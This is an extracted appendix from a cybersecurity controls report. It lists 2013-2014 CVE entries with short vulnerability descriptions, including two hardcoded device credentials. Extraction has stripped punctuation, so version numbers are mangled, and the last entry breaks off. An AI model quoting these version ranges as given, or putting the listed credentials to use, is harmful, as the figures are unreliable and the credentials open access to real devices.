CVE-2013-3860rdquoMicrosoft NET Framework 20 SP2 3535 SP1 351 4 and 45 does x000Dnot properly parse a DTD during XMLdigital-signature validation x000D whichallows remote attackers to cause adenial of service x000D (application crashor hang) via a crafted signed XMLdocument aka x000D rdquordquoEntity ExpansionVulnerabilityrdquordquordquo
CVE-2013-3893Use-after-free vulnerability in theSetMouseCapture implementationin x000D mshtmldll in MicrosoftInternet Explorer 6 through 11 allowsremote x000D attackers to executearbitrary code via crafted JavaScript stringsas x000D demonstrated by use of an ms-help URL that triggers loading of x000Dhxdsdll
CVE-2013-3897rdquoUse-after-free vulnerability in theCDisplayPointer class in mshtmldll in
Microsoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via crafted JavaScript code thatuses the onpropertychange event handleras exploited in the wild in September andOctober 2013 aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2013-3900rdquoThe WinVerifyTrust function in MicrosoftWindows XP SP2 and SP3 Windows Server2003 SP2 Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and Windows RTGold and 81 does not properly validate PEfile digests during Authenticode signatureverification which allows remote attackersto execute arbitrary code via a craftedPE file aka rdquordquoWinVerifyTrust SignatureValidation Vulnerabilityrdquordquordquo
CVE-2013-3905rdquoMicrosoft Outlook 2007 SP3 2010 SP1and SP2 2013 and 2013 RT does x000Dnot properly expand metadata containedin SMIME certificates which x000Dallows remote attackers to obtain sensitivenetwork configuration and x000D stateinformation via a crafted certificate in an e-mail message aka x000D rdquordquoSMIME AIAVulnerabilityrdquordquordquo
CVE-2013-4223The Gentoo Nullmailer package before 111-r2 uses world-readable x000D permissionsfor etcnullmailerremotes which allowslocal users to x000D obtain SMTPauthentication credentials by reading thefile
CVE-2013-4436The default configuration for salt-ssh inSalt (aka SaltStack) 0170 x000D doesnot validate the SSH host key of requestswhich allows remote x000D attackers tohave unspecified impact via a man-in-the-middle (MITM) x000D attack
CVE-2013-4478Sup before 01321 and 014x before01411 allows remote attackers x000Dto execute arbitrary commands via shellmetacharacters in the filename x000D ofan email attachment
CVE-2013-4529Buffer overflow in hwpcipcie aerc inQEMU before 172 allows x000D remoteattackers to cause a denial of service andpossibly execute x000D arbitrary code viaa large log num value in a savevm image
CVE-2013-4555Cross-site request forgery(CSRF) vulnerability in x000Decrireactionlogoutphp in SPIP before2124 allows remote attackers x000D tohijack the authentication of arbitrary usersfor requests that x000D logout the uservia unspecified vectors
CVE-2013-4776NETGEAR ProSafe GS724Tv3 andGS716Tv2 with firmware 54113and x000D earlier GS748Tv454114 and GS510TP 5044 allowsremote x000D attackers to cause adenial of service (reboot or crash) viaa crafted x000D HTTP request tofilesystem
CVE-2013-4782
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 21 of 28
The Supermicro BMC implementationallows remote attackers to bypass x000Dauthentication and execute arbitrary IPMIcommands by using cipher x000D suite 0(aka cipher zero) and an arbitrary password
CVE-2013-5057rdquohxdsdll in Microsoft Office 2007 SP3 and2010 SP1 and SP2 does not implementthe ASLR protection mechanism whichmakes it easier for remote attackers toexecute arbitrary code via a crafted COMcomponent on a web site that is visitedwith Internet Explorer as exploited in thewild in December 2013 aka rdquordquoHXDS ASLRVulnerabilityrdquordquordquo
CVE-2013-5369IBM SPSS Analytical Decision Management61 before IF1 62 before x000D IF1 and70 before FP1 IF6 might allow remoteattackers to execute x000D arbitrary codeby deploying and accessing a service
CVE-2013-5428IBM WebSphere DataPower XC10appliances 250 do not require x000Dauthentication for all administrative actionswhich allows remote x000D attackers tocause a denial of service via unspecifiedvectors
CVE-2013-5431Open redirect vulnerability in IBM TivoliFederated Identity Manager x000D(TFIM) 611 before IF 15 620 beforeIF 14 621 and 622 before x000D IF8 and Tivoli Federated Identity ManagerBusiness Gateway (TFIMBG) x000D 611before IF 15 620 before IF 14 621 and622 before IF 8 x000D allows remoteattackers to redirect users to arbitrary websites and x000D conduct phishing attacksvia unspecified vectors
CVE-2013-5494Cross-site request forgery (CSRF)vulnerability in the web framework x000Din Cisco Unified MeetingPlace Solution asused in Unified x000D MeetingPlace WebConferencing and Unified MeetingPlaceallows remote x000D attackers to hijackthe authentication of arbitrary usersaka Bug IDs x000D CSCui45209 andCSCui44674
CVE-2013-5507The IPsec implementation in Cisco AdaptiveSecurity Appliance (ASA) x000D Software91 before 91(17) when an IPsec VPNtunnel is enabled x000D allows remoteattackers to cause a denial of service (devicereload) x000D via a (1) ICMP or (2)ICMPv6 packet that is improperly handledduring x000D decryption aka Bug IDCSCue18975
CVE-2013-5536Cisco Secure Access Control System (ACS)does not properly implement x000D anincoming-packet firewall rule which allowsremote attackers to x000D cause a denialof service (process crash) via a floodof crafted x000D packets aka Bug IDCSCui51521
CVE-2013-5559Buffer overflow in the Active TemplateLibrary (ATL) framework in the x000DVPNAPI COM module in Cisco AnyConnectSecure Mobility Client 2x x000D allowsuser-assisted remote attackers to executearbitrary code via a x000D crafted HTMLdocument aka Bug ID CSCuj58139
CVE-2013-5561The Safe Search enforcement feature inCisco Adaptive Security x000D Appliance(ASA) CX Context-Aware SecuritySoftware does not properly x000D performfiltering which allows remote attackers tobypass intended x000D policy restrictionsvia unspecified vectors aka Bug IDCSCui94622
CVE-2013-5751Directory traversal vulnerability in SAPNetWeaver 7x allows remote x000Dattackers to read arbitrary files viaunspecified vectors
CVE-2013-5757Absolute path traversal vulnerability inYealink VoIP Phone SIP-T38G allowsremote authenticated users to readarbitrary files via a full pathname in thedumpConfigFile function in the commandparameter to cgi-bincgiServerexx
CVE-2013-5828Unspecified vulnerability in the EnterpriseManager Base Platform x000D componentin Oracle Enterprise Manager Grid ControlEM Base Platform x000D 10205 and11101 EM DB Control 11107 11202and 11203 x000D and EM Pluginfor DB 12102 and 12103 allowsremote attackers to x000D affect integrityvia unknown vectors related to StorageManagement
CVE-2013-6167Mozilla Firefox through 27 sends HTTPCookie headers without first x000Dvalidating that they have the requiredcharacter-set restrictions x000D whichallows remote attackers to conduct theequivalent of a x000D persistent LogoutCSRF attack via a crafted parameterthat forces a x000D web application toset a malformed cookie within an HTTPresponse
CVE-2013-6188Cross-site request forgery (CSRF)vulnerability in HP System x000DManagement Homepage (SMH) 71through 722 allows remote attackersto x000D hijack the authentication ofunspecified victims via unknown vectors
CVE-2013-6284rdquoUnspecified vulnerability in the StatutoryReporting for Insurance x000D (FS SR)component in the Financial Servicesmodule for SAP ERP Central x000DComponent (ECC) allows attackersto execute arbitrary code via x000Dunspecified vectors related to a rdquordquocodeinjection vulnerabilityrdquordquordquo
CVE-2013-6396The OpenStack Python client libraryfor Swift (python-swiftclient) 10 x000Dthrough 190 does not verify X509certificates from SSL servers x000D whichallows man-in-the-middle attackers tospoof servers and obtain x000D sensitiveinformation via a crafted certificate
CVE-2013-6475Multiple integer overflows in (1)OPVPOutputDevcxx and (2) x000DoprsOPVPSplashcxx in the pdftoopvpfilter in CUPS and cups-filters x000Dbefore 1047 allow remote attackers toexecute arbitrary code via a x000D craftedPDF file which triggers a heap-based bufferoverflow
CVE-2013-6660The drag-and-drop implementation inGoogle Chrome before 3301750117 doesnot properly restrict the information inWebDropData data structures which allowsremote attackers to discover full pathnamesvia a crafted web site
CVE-2013-6699The Control and Provisioning of WirelessAccess Points (CAPWAP) x000D protocolimplementation on Cisco Wireless LANController (WLC) devices x000D allowsremote attackers to cause a denial of servicevia a crafted x000D CAPWAP packet thattriggers a buffer over-read aka Bug IDCSCuh81880
CVE-2013-6702The management implementation on CiscoONS 15454 controller cards with x000Dsoftware 98 and earlier allows remoteattackers to cause a denial of x000Dservice (card reset) via crafted packets akaBug ID CSCtz50902
CVE-2013-6979The VTY authentication implementation inCisco IOS XE 0302xxSE and 0303xxSEincorrectly relies on the Linux-IOS internal-network configuration which allows remoteattackers to bypass authentication byleveraging access to a 192168x2 sourceIP address aka Bug ID CSCuj90227
CVE-2013-6994OpenText Exceed OnDemand (EoD) 8transmits the session ID in x000D cleartextwhich allows remote attackers to performsession fixation x000D attacks by sniffingthe network
CVE-2013-7004D-Link DSR-150 with firmware before108B44 DSR-150N with firmware before105B64 DSR-250 and DSR-250N withfirmware before 108B44 and DSR-500 DSR-500N DSR-1000 and DSR-1000N with firmware before 108B77have a hardcoded account of usernamegkJ9232xXyruTRmY which makes it easierfor remote attackers to obtain access byleveraging knowledge of the username
CVE-2013-7043Multiple cross-site request forgery (CSRF)vulnerabilities on Cisco x000D ScientificAtlanta DPR2320R2 routers with software202r1262-090417 x000D allow remoteattackers to hijack the authentication ofadministrators x000D for requests that(1) change a password via the Passwordparameter to x000D goformRgSecurity(2) reboot the device via the Restartparameter to x000D goformrestart (3)modify Wi-Fi settings as demonstratedby the x000D WpaPreSharedKeyparameter to goformwlanSecurity or(4) modify x000D parental controls viathe ParentalPassword parameter to x000DgoformRgParentalBasic
CVE-2013-7389Multiple cross-site scripting (XSS)vulnerabilities in D-Link DIR-645 Router(Rev A1) with firmware before 104B11allow remote attackers to inject arbitraryweb script or HTML via the (1) deviceidparameter to parentalcontrolsbindphp(2) RESULT parameter to infophp or (3)receiver parameter to bsc sms sendphp
CVE-2014-0001Buffer overflow in clientmysqlcc in Oracle
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 22 of 28
MySQL and MariaDB before 5535 allowsremote database servers to cause a denialof service (crash) and possibly executearbitrary code via a long server versionstring
CVE-2014-0035The SymmetricBinding in Apache CXFbefore 2613 and 27x before 2710when EncryptBeforeSigning is enabledand the UsernameToken policy is set toan EncryptedSupportingToken transmitsthe UsernameToken in cleartext whichallows remote attackers to obtain sensitiveinformation by sniffing the network
CVE-2014-0160The (1) TLS and (2) DTLSimplementations in OpenSSL 101 before101g do not properly handle HeartbeatExtension packets which allows remoteattackers to obtain sensitive informationfrom process memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading private keysrelated to d1 bothc and t1 libc aka theHeartbleed bug
CVE-2014-0207The cdf read short sector function in cdfcin file before 519 as used in the Fileinfocomponent in PHP before 5430 and 55xbefore 5514 allows remote attackers tocause a denial of service (assertion failureand application exit) via a crafted CDF file
CVE-2014-0259rdquoMicrosoft Word 2007 SP3 and OfficeCompatibility Pack SP3 allow remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted Office document aka rdquordquoWordMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-0266rdquoThe XMLHTTP ActiveX controls in XMLCore Services 30 in Microsoft WindowsXP SP2 and SP3 Windows Server 2003SP2 Windows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RT Goldand 81 allow remote attackers to bypass theSame Origin Policy via a web page that isvisited in Internet Explorer aka rdquordquoMSXMLInformation Disclosure Vulnerabilityrdquordquordquo
CVE-2014-0294rdquoMicrosoft Forefront Protection 2010for Exchange Server does not properlyparse e-mail content which might allowremote attackers to execute arbitrarycode via a crafted message aka rdquordquoRCEVulnerabilityrdquordquordquo
CVE-2014-0313rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-0321rdquo
CVE-2014-0354The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 100(BFQ6)C0has a hardcoded password of qweasdzxcfor an unspecified account which allowsremote attackers to obtain indexasp loginaccess via an HTTP request
CVE-2014-0362Cross-site scripting (XSS) vulnerability
on Google Search Appliance (GSA)devices before 7014G216 and 72 before720G114 when dynamic navigation isconfigured allows remote attackers to injectarbitrary web script or HTML via inputincluded in a SCRIPT element
CVE-2014-0433Unspecified vulnerability in the MySQLServer component in Oracle MySQL 5613and earlier allows remote attackers to affectavailability via unknown vectors related toThread Pooling
CVE-2014-0488rdquoAPT before 109 does not rdquordquoinvalidaterepository datardquordquo when moving from anunauthenticated to authenticated statewhich allows remote attackers to haveunspecified impact via crafted repositorydatardquo
CVE-2014-0493Adobe Reader and Acrobat 10x before1019 and 11x before 11006 on Windowsand Mac OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-0495
CVE-2014-0494Adobe Digital Editions 201 allowsattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via unspecified vectors
CVE-2014-0498Stack-based buffer overflow in AdobeFlash Player before 117700269 and118x through 120x before 120070on Windows and Mac OS X and before112202341 on Linux Adobe AIR before4001628 on Android Adobe AIR SDKbefore 4001628 and Adobe AIR SDK ampCompiler before 4001628 allows attackersto execute arbitrary code via unspecifiedvectors
CVE-2014-0515Buffer overflow in Adobe Flash Playerbefore 117700279 and 118x through130x before 1300206 on Windows andOS X and before 112202356 on Linuxallows remote attackers to execute arbitrarycode via unspecified vectors as exploitedin the wild in April 2014
CVE-2014-0533Cross-site scripting (XSS) vulnerability inAdobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allows remoteattackers to inject arbitrary web script orHTML via unspecified vectors a differentvulnerability than CVE-2014-0531 and CVE-2014-0532
CVE-2014-0536Adobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allow attackersto execute arbitrary code or cause a denial ofservice (memory corruption) via unspecifiedvectors
CVE-2014-0562rdquoCross-site scripting (XSS) vulnerability in
Adobe Reader and Acrobat 10x before10112 and 11x before 11009 on OS Xallows remote attackers to inject arbitraryweb script or HTML via unspecified vectorsaka rdquordquoUniversal XSS (UXSS)rdquordquordquo
CVE-2014-0577rdquoAdobe Flash Player before 1300252and 14x and 15x before 1500223 onWindows and OS X and before 112202418on Linux Adobe AIR before 1500356Adobe AIR SDK before 1500356 andAdobe AIR SDK amp Compiler before1500356 allow attackers to executearbitrary code by leveraging an unspecifiedrdquordquotype confusionrdquordquo a different vulnerabilitythan CVE-2014-0584 CVE-2014-0585CVE-2014-0586 and CVE-2014-0590rdquo
CVE-2014-0765Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along GotoCmd argument
CVE-2014-0767Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along AccessCode argument
CVE-2014-0783Stack-based buffer overflow inBKHOdeqexe in Yokogawa CENTUMCS 3000 R30950 and earlier allows remoteattackers to execute arbitrary code via acrafted TCP packet
CVE-2014-1330WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1342WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1349Use-after-free vulnerability in Safari inApple iOS before 712 allows remoteattackers to execute arbitrary code or causea denial of service (application crash) viaan invalid URL
CVE-2014-1356Heap-based buffer overflow in launchdin Apple iOS before 712 Apple OS Xbefore 1094 and Apple TV before 612allows attackers to execute arbitrary codevia a crafted application that sends IPCmessages
CVE-2014-1370The byte-swapping implementation incopyfile in Apple OS X before 1094 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsmemory access and application crash) via acrafted AppleDouble file in a ZIP archive
CVE-2014-1379Graphics Drivers in Apple OS X before1094 allows attackers to gain privilegesor cause a denial of service (NULL pointerdereference and system crash) via a 32-bit
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 23 of 28
executable file for a crafted application
CVE-2014-1382WebKit as used in Apple iOS before712 Apple Safari before 615 and 7xbefore 705 and Apple TV before 612allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption and application crash) via acrafted web site a different vulnerabilitythan other WebKit CVEs listed in APPLE-SA-2014-06-30-1 APPLE-SA-2014-06-30-3 and APPLE-SA-2014-06-30-4
CVE-2014-1466SQL injection vulnerability in CSP MySQLUser Manager 23 allows remote attackersto execute arbitrary SQL commands via thelogin field of the login page
CVE-2014-1472Multiple cross-site scripting (XSS)vulnerabilities in the Enterprise Managerin McAfee Vulnerability Manager (MVM)755 and earlier allow remote attackers toinject arbitrary web script or HTML viaunspecified vectors
CVE-2014-1477Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before270 Firefox ESR 24x before 243Thunderbird before 243 and SeaMonkeybefore 224 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1518Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before290 Firefox ESR 24x before 245Thunderbird before 245 and SeaMonkeybefore 226 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1563Use-after-free vulnerability in themozillaDOMSVGLengthGetTearOfffunction in Mozilla Firefox before 320Firefox ESR 31x before 311 andThunderbird 31x before 311 allows remoteattackers to execute arbitrary code orcause a denial of service (heap memorycorruption) via an SVG animation withDOM interaction that triggers incorrectcycle collection
CVE-2014-1565The mozilladomAudioEventTimelinefunction in the Web Audio APIimplementation in Mozilla Firefox before320 Firefox ESR 31x before 311 andThunderbird 31x before 311 does notproperly create audio timelines whichallows remote attackers to obtain sensitiveinformation from process memory or causea denial of service (out-of-bounds read) viacrafted API calls
CVE-2014-1586contentbasesrcnsDocumentcpp inMozilla Firefox before 330 Firefox ESR31x before 312 and Thunderbird 31xbefore 312 does not consider whetherWebRTC video sharing is occurring whichallows remote attackers to obtain sensitiveinformation from the local camera in certainIFRAME situations by maintaining a sessionafter the user temporarily navigates away
CVE-2014-1701
The GenerateFunction function inbindingsscriptscode generator v8pmin Blink as used in Google Chrome before3301750149 does not implement acertain cross-origin restriction for theEventTargetdispatchEvent functionwhich allows remote attackers to conductUniversal XSS (UXSS) attacks via vectorsinvolving events
CVE-2014-1740Multiple use-after-free vulnerabilities innetwebsocketswebsocket jobcc in theWebSockets implementation in GoogleChrome before 3401847137 allow remoteattackers to cause a denial of service orpossibly have unspecified other impact viavectors related to WebSocketJob deletion
CVE-2014-1744Integer overflow in the AudioInputRendererHostOnCreateStream functionin contentbrowserrendererhostmediaaudio input renderer hostccin Google Chrome before 3501916114allows remote attackers to cause a denial ofservice or possibly have unspecified otherimpact via vectors that trigger a largeshared-memory allocation
CVE-2014-1753rdquoMicrosoft Internet Explorer 6 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-1806rdquoThe NET Remoting implementation inMicrosoft NET Framework 11 SP120 SP2 35 351 4 45 and451 does not properly restrict memoryaccess which allows remote attackers toexecute arbitrary code via vectors involvingmalformed objects aka rdquordquoTypeFilterLevelVulnerabilityrdquordquordquo
CVE-2014-1808rdquoMicrosoft Office 2013 Gold SP1 RTand RT SP1 allows remote attackers toobtain sensitive token information via aweb site that sends a crafted responseduring opening of an Office document akardquordquoToken Reuse Vulnerabilityrdquordquordquo
CVE-2014-1811rdquoThe TCP implementation in MicrosoftWindows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RTGold and 81 allows remote attackers tocause a denial of service (non-paged poolmemory consumption and system hang) viamalformed data in the Options field of aTCP header aka rdquordquoTCP Denial of ServiceVulnerabilityrdquordquordquo
CVE-2014-1812rdquoThe Group Policy implementation inMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows7 SP1 Windows 8 Windows 81 andWindows Server 2012 Gold and R2 does notproperly handle distribution of passwordswhich allows remote authenticated users toobtain sensitive credential information andconsequently gain privileges by leveragingaccess to the SYSVOL share as exploited inthe wild in May 2014 aka rdquordquoGroup PolicyPreferences Password Elevation of PrivilegeVulnerabilityrdquordquordquo
CVE-2014-2014imapsync before 1584 when running withthe ndashtls option attempts a cleartext loginwhen a certificate verification failure occurswhich allows remote attackers to obtaincredentials by sniffing the network
CVE-2014-2103Cisco Intrusion Prevention System (IPS)Software allows remote attackers to cause adenial of service (MainApp process outage)via malformed SNMP packets aka Bug IDsCSCum52355 and CSCul49309
CVE-2014-2109The TCP Input module in Cisco IOS122 through 124 and 150 through 154when NAT is used allows remote attackersto cause a denial of service (memoryconsumption or device reload) via craftedTCP packets aka Bug IDs CSCuh33843and CSCuj41494
CVE-2014-2364Multiple stack-based buffer overflows inAdvantech WebAccess before 72 allowremote attackers to execute arbitrary codevia a long string in the (1) ProjectName(2) SetParameter (3) NodeName(4) CCDParameter (5) SetColor (6)AlarmImage (7) GetParameter (8)GetColor (9) ServerResponse (10)SetBaud or (11) IPAddress parameterto an ActiveX control in (a) webvactocx(b) dvsocx or (c) webdactocx
CVE-2014-2416Unspecified vulnerability in the OracleData Integrator component in OracleFusion Middleware 111130 allows remoteattackers to affect availability via unknownvectors related to Data Quality a differentvulnerability than CVE-2014-2407 CVE-2014-2415 CVE-2014-2417 and CVE-2014-2418
CVE-2014-2554OTRS 31x before 3121 32x before3216 and 33x before 336 allows remoteattackers to conduct clickjacking attacks viaan IFRAME element
CVE-2014-2643Unspecified vulnerability in HP SystemsInsight Manager (SIM) before 74 allowsremote authenticated users to gainprivileges via unknown vectors
CVE-2014-2742rdquoIsode M-Link before 160v7 does notproperly restrict the processing ofcompressed XML elements which allowsremote attackers to cause a denial of service(resource consumption) via a crafted XMPPstream aka an rdquordquoxmppbombrdquordquo attackrdquo
CVE-2014-2768rdquoMicrosoft Internet Explorer 6 through 8allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2773rdquo
CVE-2014-2789rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2795 CVE-2014-2798 andCVE-2014-2804rdquo
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 24 of 28
CVE-2014-2791rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted web site aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-2794rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2788rdquo
CVE-2014-2808rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2796 CVE-2014-2825CVE-2014-4050 CVE-2014-4055 and CVE-2014-4067rdquo
CVE-2014-2821rdquoMicrosoft Internet Explorer 8 and 9 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-3444The GetGUID function in codecsdmp4dllin RealNetworks RealPlayer 160351 andearlier allows remote attackers to executearbitrary code or cause a denial of service(write access violation and applicationcrash) via a malformed 3gp file
CVE-2014-3489libutilmiq-passwordrb in Red HatCloudForms 30 Management Engine(CFME) before 5242 uses a hard-codedsalt which makes it easier for remoteattackers to guess passwords via a bruteforce attack
CVE-2014-3507Memory leak in d1 bothc in the DTLSimplementation in OpenSSL 098 before098zb 100 before 100n and 101before 101i allows remote attackersto cause a denial of service (memoryconsumption) via zero-length DTLSfragments that trigger improper handling ofthe return value of a certain insert function
CVE-2014-3556rdquoThe STARTTLS implementation inmailngx mail smtp handlerc in the SMTPproxy in nginx 15x and 16x before 161and 17x before 174 does not properlyrestrict IO buffering which allows man-in-the-middle attackers to insert commandsinto encrypted SMTP sessions by sending acleartext command that is processed afterTLS is in place related to a rdquordquoplaintextcommand injectionrdquordquo attack a similar issueto CVE-2011-0411rdquo
CVE-2014-3580The mod dav svn Apache HTTPD servermodule in Apache Subversion 1x before1719 and 18x before 1811 allows remoteattackers to cause a denial of service (NULLpointer dereference and server crash) via aREPORT request for a resource that doesnot exist
CVE-2014-3814
The Juniper Networks NetScreen Firewalldevices with ScreenOS before 63r17 whenconfigured to use the internal DNS lookupclient allows remote attackers to cause adenial of service (crash and reboot) viaa sequence of malformed packets to thedevice IP
CVE-2014-3819Juniper Junos 114 before 114R12 121before 121R10 121X44 before 121X44-D35 121X45 before 121X45-D25121X46 before 121X46-D20 121X47before 121X47-D10 122 before 122R8123 before 123R7 131 before 131R4132 before 132R4 133 before 133R2and 141 before 141R1 when Auto-RP isenabled allows remote attackers to causea denial of service (RDP routing processcrash and restart) via a malformed PIMpacket
CVE-2014-3872Multiple SQL injection vulnerabilities inthe administration login page in D-LinkDAP-1350 (Rev A1) with firmware114 and earlier allow remote attackers toexecute arbitrary SQL commands via the(1) username or (2) password
CVE-2014-4044OpenAFS 168 does not properly clear thefields in the host structure which allowsremote attackers to cause a denial of service(uninitialized memory access and crash)via unspecified vectors related to TMAYrequests
CVE-2014-4079rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090 CVE-2014-4094CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4082rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4100rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4105rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memory
corruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4114rdquoMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and WindowsRT Gold and 81 allow remote attackersto execute arbitrary code via a craftedOLE object in an Office document asexploited in the wild with a rdquordquoSandwormrdquordquoattack in June through October 2014 akardquordquoWindows OLE Remote Code ExecutionVulnerabilityrdquordquordquo
CVE-2014-4127rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4130rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4132 and CVE-2014-4138rdquo
CVE-2014-4132rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4130 and CVE-2014-4138rdquo
CVE-2014-4133rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4137rdquo
CVE-2014-4141rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4481Integer overflow in CoreGraphics in AppleiOS before 813 Apple OS X before10102 and Apple TV before 703 allowsremote attackers to execute arbitrary codeor cause a denial of service (applicationcrash) via a crafted PDF document
CVE-2014-4617The do uncompress function ing10compressc in GnuPG 1x before1417 and 2x before 2024 allows context-dependent attackers to cause a denialof service (infinite loop) via malformedcompressed packets as demonstrated by
